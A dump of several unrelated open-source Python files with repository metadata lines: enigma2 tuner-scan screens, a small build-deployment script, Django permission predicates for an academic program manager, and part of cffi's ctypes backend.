if self.scan_onlyfree.value:
flags |= eComponentScan.scanOnlyFree
for x in self["config"].list:
x[1].save()
if action == START_SCAN:
self.startScan(tlist, flags, index_to_scan, self.networkid)
elif action == SEARCH_CABLE_TRANSPONDERS:
self.flags = flags
self.feid = index_to_scan
self.tlist = []
self.startCableTransponderSearch(self.feid)
elif action == SEARCH_TERRESTRIAL2_TRANSPONDERS:
self.flags = flags
self.feid = index_to_scan
self.tlist = tlist
self.startTerrestrialTransponderSearch(self.feid, nimmanager.getTerrestrialDescription(self.feid))
def setCableTransponderSearchResult(self, tlist):
self.tlist = tlist
def cableTransponderSearchFinished(self):
if self.tlist is None:
self.tlist = []
else:
self.startScan(self.tlist, self.flags, self.feid)
def setTerrestrialTransponderSearchResult(self, tlist):
if tlist is not None:
self.tlist.extend(tlist)
def terrestrialTransponderSearchFinished(self):
if self.tlist is None:
self.tlist = []
else:
self.startScan(self.tlist, self.flags, self.feid)
def predefinedTranspondersList(self, orbpos):
default = None
if orbpos is not None:
list = []
if self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S2:
fec = self.scan_sat.fec_s2.value
else:
fec = self.scan_sat.fec.value
compare = [0, self.scan_sat.frequency.value*1000, self.scan_sat.symbolrate.value*1000, self.scan_sat.polarization.value, fec]
i = 0
tps = nimmanager.getTransponders(orbpos)
for tp in tps:
if tp[0] == 0:
if default is None and self.compareTransponders(tp, compare):
default = str(i)
list.append((str(i), self.humanReadableTransponder(tp)))
i += 1
self.preDefTransponders = ConfigSelection(choices = list, default = default)
return default
def humanReadableTransponder(self, tp):
if tp[3] in range (4) and tp[4] in range (11):
pol_list = ['H','V','L','R']
fec_list = ['Auto','1/2','2/3','3/4','5/6','7/8','8/9','3/5','4/5','9/10','None']
return str(tp[1] / 1000) + " " + pol_list[tp[3]] + " " + str(tp[2] / 1000) + " " + fec_list[tp[4]]
return _("Invalid transponder data")
def compareTransponders(self, tp, compare):
frequencyTolerance = 2000 #2 MHz
symbolRateTolerance = 10
return abs(tp[1] - compare[1]) <= frequencyTolerance and abs(tp[2] - compare[2]) <= symbolRateTolerance and tp[3] == compare[3] and (not tp[4] or tp[4] == compare[4])
def predefinedTerrTranspondersList(self):
default = None
		list = []
		channel = ''
compare = [2, self.scan_ter.frequency.value*1000]
i = 0
index_to_scan = int(self.scan_nims.value)
channels = channelnumbers.supportedChannels(index_to_scan)
region = self.terrestrial_nims_regions[index_to_scan].value
tps = nimmanager.getTranspondersTerrestrial(region)
for tp in tps:
if tp[0] == 2: #TERRESTRIAL
channel = ''
if channels:
channel = _(' (Channel %s)') % (channelnumbers.getChannelNumber(tp[1], index_to_scan))
if default is None and self.compareTerrTransponders(tp, compare):
default = str(i)
list.append((str(i), '%s MHz %s' % (str(tp[1] / 1000000), channel)))
i += 1
print "channel", channel
self.TerrestrialTransponders = ConfigSelection(choices = list, default = default)
return default
def compareTerrTransponders(self, tp, compare):
frequencyTolerance = 1000000 #1 MHz
return abs(tp[1] - compare[1]) <= frequencyTolerance
def getTerrestrialRegionsList(self, index_to_scan = None):
default = None
list = []
if index_to_scan is None:
index_to_scan = int(self.scan_nims.value)
defaultRegionForNIM = nimmanager.getTerrestrialDescription(index_to_scan)
for r in nimmanager.terrestrialsList:
if default is None and r[0] == defaultRegionForNIM:
default = r[0]
list.append((r[0], r[0][:46]))
return ConfigSelection(choices = list, default = default)
def predefinedCabTranspondersList(self):
default = None
list = []
# 0 transponder type, 1 freq, 2 sym, 3 mod, 4 fec, 5 inv, 6 sys
compare = [1, self.scan_cab.frequency.value*1000, self.scan_cab.symbolrate.value*1000, self.scan_cab.modulation.value, self.scan_cab.fec.value, self.scan_cab.inversion.value, self.scan_cab.system.value]
i = 0
index_to_scan = int(self.scan_nims.value)
tps = nimmanager.getTranspondersCable(index_to_scan)
for tp in tps:
if tp[0] == 1: #CABLE
if default is None and self.compareCabTransponders(tp, compare):
default = str(i)
list.append((str(i), self.humanReadableCabTransponder(tp)))
i += 1
self.CableTransponders = ConfigSelection(choices = list, default = default)
return default
def humanReadableCabTransponder(self, tp):
if tp[3] in range (7) and (tp[4] in range (10) or tp[4] == 15):
mod_list = ['Auto', '16-QAM','32-QAM','64-QAM','128-QAM', '256-QAM', 'Auto']
fec_list = {0:"Auto", 1:'1/2', 2:'2/3', 3:'3/4', 4:'5/6', 5:'7/8', 6:'8/9', 7:'3/5', 8:'4/5', 9:'9/10', 15:'None'}
			tp_text = str(tp[1]/1000) + " MHz " + fec_list[tp[4]] + " " + str(tp[2]/1000) + " " + mod_list[tp[3]]
			print tp_text
			return tp_text
return _("Invalid transponder data")
def compareCabTransponders(self, tp, compare):
frequencyTolerance = 1000000 #1 MHz
symbolRateTolerance = 10
return abs(tp[1] - compare[1]) <= frequencyTolerance and abs(tp[2] - compare[2]) <= symbolRateTolerance and tp[3] == compare[3] and (not tp[4] or tp[4] == compare[4])
def startScan(self, tlist, flags, feid, networkid = 0):
if len(tlist):
# flags |= eComponentScan.scanSearchBAT
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, ServiceScan, [{"transponders": tlist, "feid": feid, "flags": flags, "networkid": networkid}])
else:
self.session.openWithCallback(self.startScanCallback, ServiceScan, [{"transponders": tlist, "feid": feid, "flags": flags, "networkid": networkid}])
else:
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
else:
self.session.open(MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
def startScanCallback(self, answer=True):
if answer:
self.doCloseRecursive()
def keyCancel(self):
self.session.nav.playService(self.session.postScanService)
for x in self["config"].list:
x[1].cancel()
self.close()
def doCloseRecursive(self):
self.session.nav.playService(self.session.postScanService)
self.closeRecursive()
class ScanSimple(ConfigListScreen, Screen, CableTransponderSearchSupport, TerrestrialTransponderSearchSupport):
def getNetworksForNim(self, nim):
if nim.isCompatible("DVB-S"):
networks = nimmanager.getSatListForNim(nim.slot)
elif nim.isCompatible("DVB-T"):
			networks = [ nimmanager.getTerrestrialDescription(nim.slot) ]
elif not nim.empty:
networks = [ nim.type ]
else:
# empty tuners provide no networks.
networks = [ ]
return networks
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Automatic Scan"))
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Scan"))
self["actions"] = ActionMap(["SetupActions", "MenuActions", "ColorActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.keyCancel,
"menu": self.doCloseRecursive,
"red": self.keyCancel,
"green": self.keyGo,
}, -2)
self.session.postScanService = session.nav.getCurrentlyPlayingServiceOrGroup()
self.list = []
tlist = []
known_networks = [ ]
nims_to_scan = [ ]
self.finished_cb = None
for nim in nimmanager.nim_slots:
# collect networks provided by this tuner
need_scan = False
networks = self.getNetworksForNim(nim)
print "nim %d provides" % nim.slot, networks
print "known:", known_networks
# we only need to scan on the first tuner which provides a network.
# this gives the first tuner for each network priority for scanning.
for x in networks:
if x not in known_networks:
need_scan = True
print x, "not in ", known_networks
known_networks.append(x)
# don't offer to scan nims if nothing is connected
if not nimmanager.somethingConnected(nim.slot):
need_scan = False
if need_scan:
nims_to_scan.append(nim)
# we save the config elements to use them on keyGo
self.nim_enable = [ ]
if len(nims_to_scan):
self.scan_networkScan = ConfigYesNo(default = True)
self.scan_clearallservices = ConfigSelection(default = "yes", choices = [("no", _("no")), ("yes", _("yes")), ("yes_hold_feeds", _("yes (keep feeds)"))])
self.list.append(getConfigListEntry(_("Network scan"), self.scan_networkScan))
self.list.append(getConfigListEntry(_("Clear before scan"), self.scan_clearallservices))
for nim in nims_to_scan:
nimconfig = ConfigYesNo(default = True)
nimconfig.nim_index = nim.slot
self.nim_enable.append(nimconfig)
self.list.append(getConfigListEntry(_("Scan ") + nim.slot_name + " (" + nim.friendly_type + ")", nimconfig))
ConfigListScreen.__init__(self, self.list)
self["header"] = Label(_("Automatic scan"))
self["footer"] = Label(_("Press OK to scan"))
def runAsync(self, finished_cb):
self.finished_cb = finished_cb
self.keyGo()
def keyGo(self):
InfoBarInstance = InfoBar.instance
if InfoBarInstance:
InfoBarInstance.checkTimeshiftRunning(self.keyGoCheckTimeshiftCallback)
else:
self.keyGoCheckTimeshiftCallback(True)
def keyGoCheckTimeshiftCallback(self, answer):
if answer:
self.scanList = []
self.known_networks = set()
self.nim_iter=0
self.buildTransponderList()
def buildTransponderList(self): # this method is called multiple times because of asynchronous stuff
APPEND_NOW = 0
SEARCH_CABLE_TRANSPONDERS = 1
SEARCH_TERRESTRIAL2_TRANSPONDERS = 2
action = APPEND_NOW
		n = self.nim_enable[self.nim_iter] if self.nim_iter < len(self.nim_enable) else None
self.nim_iter += 1
if n:
if n.value: # check if nim is enabled
flags = 0
nim = nimmanager.nim_slots[n.nim_index]
networks = set(self.getNetworksForNim(nim))
networkid = 0
				# don't scan any network twice across tuners
				networks.difference_update(self.known_networks)
				self.known_networks.update(networks)
tlist = [ ]
if nim.isCompatible("DVB-S"):
# get initial transponders for each satellite to be scanned
for sat in networks:
getInitialTransponderList(tlist, sat[0])
elif nim.isCompatible("DVB-C"):
if config.Nims[nim.slot].cable.scan_type.value == "provider":
getInitialCableTransponderList(tlist, nim.slot)
else:
action = SEARCH_CABLE_TRANSPONDERS
networkid = config.Nims[nim.slot].cable.scan_networkid.value
elif nim.isCompatible("DVB-T"):
skip_t2 = False
					if getMachineBrand() in ('Vu+',):
skip_t2 = True
if nim.isCompatible("DVB-T2"):
scan_util = len(self.terrestrialTransponderGetCmd(nim.slot)) and True or False
if scan_util:
action = SEARCH_TERRESTRIAL2_TRANSPONDERS
else:
skip_t2 = False
getInitialTerrestrialTransponderList(tlist, nimmanager.getTerrestrialDescription(nim.slot), skip_t2)
else:
assert False
flags = self.scan_networkScan.value and eComponentScan.scanNetworkSearch or 0
tmp = self.scan_clearallservices.value
if tmp == "yes":
flags |= eComponentScan.scanRemoveServices
elif tmp == "yes_hold_feeds":
flags |= eComponentScan.scanRemoveServices
flags |= eComponentScan.scanDontRemoveFeeds
if action == APPEND_NOW:
self.scanList.append({"transponders": tlist, "feid": nim.slot, "flags": flags})
elif action == SEARCH_CABLE_TRANSPONDERS:
self.flags = flags
self.feid = nim.slot
self.networkid = networkid
self.startCableTransponderSearch(nim.slot)
return
elif action == SEARCH_TERRESTRIAL2_TRANSPONDERS:
self.tlist = tlist
self.flags = flags
self.feid = nim.slot
self.startTerrestrialTransponderSearch(nim.slot, nimmanager.getTerrestrialDescription(nim.slot))
return
else:
assert False
self.buildTransponderList() # recursive call of this function !!!
return
# when we are here, then the recursion is finished and all enabled nims are checked
# so we now start the real transponder scan
self.startScan(self.scanList)
def startScan(self, scanList):
if len(scanList):
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, ServiceScan, scanList = scanList)
else:
self.session.open(ServiceScan, scanList = scanList)
else:
if self.finished_cb:
self.session.openWithCallback(self.finished_cb, MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
else:
self.session.open(MessageBox, _("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."), MessageBox.TYPE_ERROR)
def setCableTransponderSearchResult(self, tlist):
if tlist is not None:
self.scanList.append({"transponders": tlist, "feid": self.feid, "flags": self.flags})
def cableTransponderSearchFinished(self):
self.buildTransponderList()
def setTerrestrialTransponderSearchResult(self, tlist):
if tlist is not None:
self.tlist.extend(tlist)
if self.tlist is not None:
self.scanList.append({"transponders": self.tlist, "feid": self.feid, "flags": self.flags})
def terrestrialTransponderSearchFinished(self):
self.buildTransponderList()
def keyCancel(self):
self.session.nav.playService(self.session.postScanService)
self.close()
def doCloseRecursive(self):
self.session.nav.playService(self.session.postScanService)
self.closeRecursive()
def Satexists(self, tlist, pos):
for x in tlist:
if x == pos:
return 1
return 0
| OpenLD/enigma2-wetek | lib/python/Screens/ScanSetup.py | Python | gpl-2.0 | 68,521 | 0.030093 |
import os
import re
import shutil
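# Copy the Release build outputs of each listed app into the Pimix
# deployment folder, keeping executables/libraries/symbols and skipping
# F# support files and vshost helpers.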
destination = 'C:/Software/Pimix/'
apps = [
'fileutil',
'jobutil'
]
include_patterns = [
    r'\.exe$',
    r'\.exe\.config$',
    r'\.dll$',
    r'\.pdb$'
]
exclude_patterns = [
'FSharp',
'vshost'
]
os.makedirs(destination, exist_ok=True)
for app in apps:
for entry in os.scandir('src/{}/bin/Release/'.format(app)):
to_copy = False
for p in include_patterns:
if re.search(p, entry.path):
to_copy = True
break
if not to_copy:
continue
for p in exclude_patterns:
if re.search(p, entry.path):
to_copy = False
break
if to_copy:
shutil.copyfile(entry.path, '{}{}'.format(destination, entry.name))
| Kimi-Arthur/Pimix | deploy.py | Python | mit | 805 | 0 |
from typing import Union
from django.conf import settings
from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _, pgettext
from rules import predicate
from base.models.academic_year import current_academic_year
from base.models.education_group_year import EducationGroupYear
from base.models.enums.education_group_categories import Categories
from base.models.enums.education_group_types import TrainingType
from education_group.auth.scope import Scope
from education_group.calendar.education_group_extended_daily_management import \
EducationGroupExtendedDailyManagementCalendar
from education_group.calendar.education_group_limited_daily_management import \
EducationGroupLimitedDailyManagementCalendar
from education_group.calendar.education_group_preparation_calendar import EducationGroupPreparationCalendar
from education_group.models.group_year import GroupYear
from osis_common.ddd import interface
from osis_role.cache import predicate_cache
from osis_role.errors import predicate_failed_msg, set_permission_error, get_permission_error
from program_management.ddd.domain import exception
from program_management.models.element import Element
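# Predicates evaluated by osis_role rules to decide whether a user may
# create, edit or delete education groups and program tree versions.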
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_training_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_mini_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_minitraining_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_trainings_removable(self, user, training_root):
training_roots = training_root.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, training_roots, 'base.delete_training')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_minitrainings_removable(self, user, minitraining_root):
minitraining_roots = minitraining_root.group.groupyear_set.all().select_related(
'education_group_type',
'management_entity',
'academic_year'
)
return _are_all_removable(self, user, minitraining_roots, 'base.delete_minitraining')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_groups_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'base.delete_group')
def _are_all_removable(self, user, objects, perm):
    # all() short-circuits: the first object the user may not act on stops the check
result = all(
user.has_perm(perm, object)
for object in objects.order_by('academic_year__year')
)
# transfers last perm error message
message = get_permission_error(user, perm)
set_permission_error(user, self.context['perm_name'], message)
return result
@predicate(bind=True)
@predicate_failed_msg(
message=pgettext("male", "The user does not have permission to create a %(category)s.") %
{"category": Categories.GROUP.value}
)
def is_not_orphan_group(self, user, education_group_year=None):
return education_group_year is not None
# FIXME: Move to business logic because it's not a predicate (found in MinimumEditableYearValidator)
@predicate(bind=True)
@predicate_failed_msg(
message=_("You cannot change/delete a education group existing before %(limit_year)s") %
{"limit_year": settings.YEAR_LIMIT_EDG_MODIFICATION}
)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_year_older_or_equals_than_limit_settings_year(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return obj.academic_year.year >= settings.YEAR_LIMIT_EDG_MODIFICATION
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_all_scopes(self, user: User, obj: GroupYear = None):
return any(Scope.ALL.name in role.scopes for role in self.context['role_qs'] if hasattr(role, 'scopes'))
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_type_authorized_according_to_user_scope(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return any(
obj.education_group_type.name in role.get_allowed_education_group_types()
for role in self.context['role_qs']
if obj.management_entity_id in self.context['role_qs'].filter(pk=role.pk).get_entities_ids()
)
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not attached to the management entity"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_management_entity(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
user_entity_ids = self.context['role_qs'].get_entities_ids()
return obj.management_entity_id in user_entity_ids
return obj
# FIXME: Move to business logic because it's not a predicate
@predicate(bind=True)
@predicate_failed_msg(message=_("You must create the version of the concerned training and then attach that version"
" inside this version"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_element_only_inside_standard_program(
self,
user: User,
education_group_year: Union[EducationGroupYear, GroupYear] = None
):
from program_management.ddd.repositories import program_tree_version
if isinstance(education_group_year, GroupYear):
element_id = Element.objects.get(group_year=education_group_year).id
try:
from program_management.ddd.domain.service import identity_search
node_identity = identity_search.NodeIdentitySearch.get_from_element_id(element_id)
tree_version_identity = identity_search.ProgramTreeVersionIdentitySearch(
).get_from_node_identity(
node_identity
)
tree_version = tree_version_identity and program_tree_version.ProgramTreeVersionRepository(
).get(tree_version_identity)
if tree_version and not tree_version.is_official_standard:
return False
except (interface.BusinessException, exception.ProgramTreeVersionNotFoundException):
pass
from program_management.ddd.repositories import load_tree_version
tree_versions = load_tree_version.load_tree_versions_from_children([element_id])
return all((version.is_official_standard for version in tree_versions))
return education_group_year
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_program_edition_period_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupPreparationCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened())
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
def have_one_program_edition_calendar_open(self, user, group_year: 'GroupYear' = None):
return is_program_edition_period_open(user, None)
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_extended_daily_management_calendar_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupExtendedDailyManagementCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened())
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
def have_one_education_group_extended_daily_management_calendar_open(self, user, group_year: 'GroupYear' = None):
return is_education_group_extended_daily_management_calendar_open(user, None)
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_limited_daily_management_calendar_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupLimitedDailyManagementCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened())
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_continuing_education_group_year(self, user, obj: Union['GroupYear', 'EducationGroupYear'] = None):
return obj and obj.education_group_type.name in TrainingType.continuing_education_types()
@predicate(bind=True)
@predicate_failed_msg(message=_("The scope of the user is limited and prevents this action to be performed"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_linked_to_all_scopes_of_management_entity(self, user, obj: Union['GroupYear', 'EducationGroupYear']):
if obj:
user_scopes = {
entity_id: scope for role in self.context['role_qs']
for scope in role.scopes if hasattr(role, 'scopes')
for entity_id in self.context['role_qs'].filter(pk=role.pk).get_entities_ids()
}
return user_scopes.get(obj.management_entity_id) == Scope.ALL.value
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("Transition version of finalities must be filled from transition version of master"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_type_eligible_to_be_filled(self, user, obj: Union['GroupYear', 'EducationGroupYear']):
if obj:
return obj.education_group_type.name not in TrainingType.finality_types()
return None
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_group_year_an_eligible_transition(
self,
user: User,
obj: GroupYear = None
):
if obj:
is_transition = obj and obj.partial_acronym.upper().startswith('T')
links_to_parent = obj.element.children_elements.all()
if links_to_parent:
parents = [link.parent_element.group_year for link in links_to_parent]
all_parents_transition = all(parent.partial_acronym.upper().startswith('T') for parent in parents)
return is_transition and all_parents_transition
return is_transition
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable in the past."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_year_not_in_past(self, user, obj: Union['GroupYear', 'EducationGroupYear']):
if obj:
return obj.academic_year.year >= current_academic_year().year
return None
| uclouvain/osis | education_group/auth/predicates.py | Python | agpl-3.0 | 12,243 | 0.003921 |
import ctypes, ctypes.util, operator, sys
from . import model
if sys.version_info < (3,):
bytechr = chr
else:
unicode = str
long = int
xrange = range
bytechr = lambda num: bytes([num])
class CTypesType(type):
pass
class CTypesData(object):
__metaclass__ = CTypesType
__slots__ = ['__weakref__']
__name__ = '<cdata>'
def __init__(self, *args):
raise TypeError("cannot instantiate %r" % (self.__class__,))
@classmethod
def _newp(cls, init):
raise TypeError("expected a pointer or array ctype, got '%s'"
% (cls._get_c_name(),))
@staticmethod
def _to_ctypes(value):
raise TypeError
@classmethod
def _arg_to_ctypes(cls, *value):
try:
ctype = cls._ctype
except AttributeError:
raise TypeError("cannot create an instance of %r" % (cls,))
if value:
res = cls._to_ctypes(*value)
if not isinstance(res, ctype):
res = cls._ctype(res)
else:
res = cls._ctype()
return res
@classmethod
def _create_ctype_obj(cls, init):
if init is None:
return cls._arg_to_ctypes()
else:
return cls._arg_to_ctypes(init)
@staticmethod
def _from_ctypes(ctypes_value):
raise TypeError
@classmethod
def _get_c_name(cls, replace_with=''):
return cls._reftypename.replace(' &', replace_with)
@classmethod
def _fix_class(cls):
cls.__name__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__qualname__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__module__ = 'ffi'
def _get_own_repr(self):
raise NotImplementedError
def _addr_repr(self, address):
if address == 0:
return 'NULL'
else:
if address < 0:
address += 1 << (8*ctypes.sizeof(ctypes.c_void_p))
return '0x%x' % address
def __repr__(self, c_name=None):
own = self._get_own_repr()
return '<cdata %r %s>' % (c_name or self._get_c_name(), own)
def _convert_to_address(self, BClass):
if BClass is None:
raise TypeError("cannot convert %r to an address" % (
self._get_c_name(),))
else:
raise TypeError("cannot convert %r to %r" % (
self._get_c_name(), BClass._get_c_name()))
@classmethod
def _get_size(cls):
return ctypes.sizeof(cls._ctype)
def _get_size_of_instance(self):
return ctypes.sizeof(self._ctype)
@classmethod
def _cast_from(cls, source):
raise TypeError("cannot cast to %r" % (cls._get_c_name(),))
def _cast_to_integer(self):
return self._convert_to_address(None)
@classmethod
def _alignment(cls):
return ctypes.alignment(cls._ctype)
def __iter__(self):
raise TypeError("cdata %r does not support iteration" % (
self._get_c_name()),)
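    # generate the six rich-comparison methods: two pointers compare by
    # address, two primitives by value, and mixed pointer/non-pointer
    # comparisons return NotImplemented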
def _make_cmp(name):
cmpfunc = getattr(operator, name)
def cmp(self, other):
v_is_ptr = not isinstance(self, CTypesGenericPrimitive)
w_is_ptr = (isinstance(other, CTypesData) and
not isinstance(other, CTypesGenericPrimitive))
if v_is_ptr and w_is_ptr:
return cmpfunc(self._convert_to_address(None),
other._convert_to_address(None))
elif v_is_ptr or w_is_ptr:
return NotImplemented
else:
if isinstance(self, CTypesGenericPrimitive):
self = self._value
if isinstance(other, CTypesGenericPrimitive):
other = other._value
return cmpfunc(self, other)
cmp.func_name = name
return cmp
__eq__ = _make_cmp('__eq__')
__ne__ = _make_cmp('__ne__')
__lt__ = _make_cmp('__lt__')
__le__ = _make_cmp('__le__')
__gt__ = _make_cmp('__gt__')
__ge__ = _make_cmp('__ge__')
def __hash__(self):
return hash(self._convert_to_address(None))
def _to_string(self, maxlen):
raise TypeError("string(): %r" % (self,))
class CTypesGenericPrimitive(CTypesData):
__slots__ = []
def __hash__(self):
return hash(self._value)
def _get_own_repr(self):
return repr(self._from_ctypes(self._value))
class CTypesGenericArray(CTypesData):
__slots__ = []
@classmethod
def _newp(cls, init):
return cls(init)
def __iter__(self):
for i in xrange(len(self)):
yield self[i]
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
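# Base class for pointer-flavoured cdata objects: it keeps the raw integer
# address alongside a ctypes pointer view of the same memory.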
class CTypesGenericPtr(CTypesData):
__slots__ = ['_address', '_as_ctype_ptr']
_automatic_casts = False
kind = "pointer"
@classmethod
def _newp(cls, init):
return cls(init)
@classmethod
def _cast_from(cls, source):
if source is None:
address = 0
elif isinstance(source, CTypesData):
address = source._cast_to_integer()
elif isinstance(source, (int, long)):
address = source
else:
raise TypeError("bad type for cast to %r: %r" %
(cls, type(source).__name__))
return cls._new_pointer_at(address)
@classmethod
def _new_pointer_at(cls, address):
self = cls.__new__(cls)
self._address = address
self._as_ctype_ptr = ctypes.cast(address, cls._ctype)
return self
def _get_own_repr(self):
try:
return self._addr_repr(self._address)
except AttributeError:
return '???'
def _cast_to_integer(self):
return self._address
def __nonzero__(self):
return bool(self._address)
__bool__ = __nonzero__
@classmethod
def _to_ctypes(cls, value):
if not isinstance(value, CTypesData):
raise TypeError("unexpected %s object" % type(value).__name__)
address = value._convert_to_address(cls)
return ctypes.cast(address, cls._ctype)
@classmethod
def _from_ctypes(cls, ctypes_ptr):
address = ctypes.cast(ctypes_ptr, ctypes.c_void_p).value or 0
return cls._new_pointer_at(address)
@classmethod
def _initialize(cls, ctypes_ptr, value):
if value:
ctypes_ptr.contents = cls._to_ctypes(value).contents
def _convert_to_address(self, BClass):
if (BClass in (self.__class__, None) or BClass._automatic_casts
or self._automatic_casts):
return self._address
else:
return CTypesData._convert_to_address(self, BClass)
class CTypesBaseStructOrUnion(CTypesData):
__slots__ = ['_blob']
@classmethod
def _create_ctype_obj(cls, init):
# may be overridden
raise TypeError("cannot instantiate opaque type %s" % (cls,))
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
@classmethod
def _offsetof(cls, fieldname):
return getattr(cls._ctype, fieldname).offset
def _convert_to_address(self, BClass):
if getattr(BClass, '_BItem', None) is self.__class__:
return ctypes.addressof(self._blob)
else:
return CTypesData._convert_to_address(self, BClass)
@classmethod
def _from_ctypes(cls, ctypes_struct_or_union):
self = cls.__new__(cls)
self._blob = ctypes_struct_or_union
return self
@classmethod
def _to_ctypes(cls, value):
return value._blob
def __repr__(self, c_name=None):
return CTypesData.__repr__(self, c_name or self._get_c_name(' &'))
class CTypesBackend(object):
PRIMITIVE_TYPES = {
'char': ctypes.c_char,
'short': ctypes.c_short,
'int': ctypes.c_int,
'long': ctypes.c_long,
'long long': ctypes.c_longlong,
'signed char': ctypes.c_byte,
'unsigned char': ctypes.c_ubyte,
'unsigned short': ctypes.c_ushort,
'unsigned int': ctypes.c_uint,
'unsigned long': ctypes.c_ulong,
'unsigned long long': ctypes.c_ulonglong,
'float': ctypes.c_float,
'double': ctypes.c_double,
'_Bool': ctypes.c_bool,
}
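    # alias the <stdint.h> fixed-width names (uint8_t .. int64_t, size_t,
    # intptr_t, ...) to whichever native ctypes type has the matching size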
for _name in ['unsigned long long', 'unsigned long',
'unsigned int', 'unsigned short', 'unsigned char']:
_size = ctypes.sizeof(PRIMITIVE_TYPES[_name])
PRIMITIVE_TYPES['uint%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_void_p):
PRIMITIVE_TYPES['uintptr_t'] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_size_t):
PRIMITIVE_TYPES['size_t'] = PRIMITIVE_TYPES[_name]
for _name in ['long long', 'long', 'int', 'short', 'signed char']:
_size = ctypes.sizeof(PRIMITIVE_TYPES[_name])
PRIMITIVE_TYPES['int%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_void_p):
PRIMITIVE_TYPES['intptr_t'] = PRIMITIVE_TYPES[_name]
PRIMITIVE_TYPES['ptrdiff_t'] = PRIMITIVE_TYPES[_name]
if _size == ctypes.sizeof(ctypes.c_size_t):
PRIMITIVE_TYPES['ssize_t'] = PRIMITIVE_TYPES[_name]
def __init__(self):
self.RTLD_LAZY = 0 # not supported anyway by ctypes
self.RTLD_NOW = 0
self.RTLD_GLOBAL = ctypes.RTLD_GLOBAL
self.RTLD_LOCAL = ctypes.RTLD_LOCAL
def set_ffi(self, ffi):
self.ffi = ffi
def _get_types(self):
return CTypesData, CTypesType
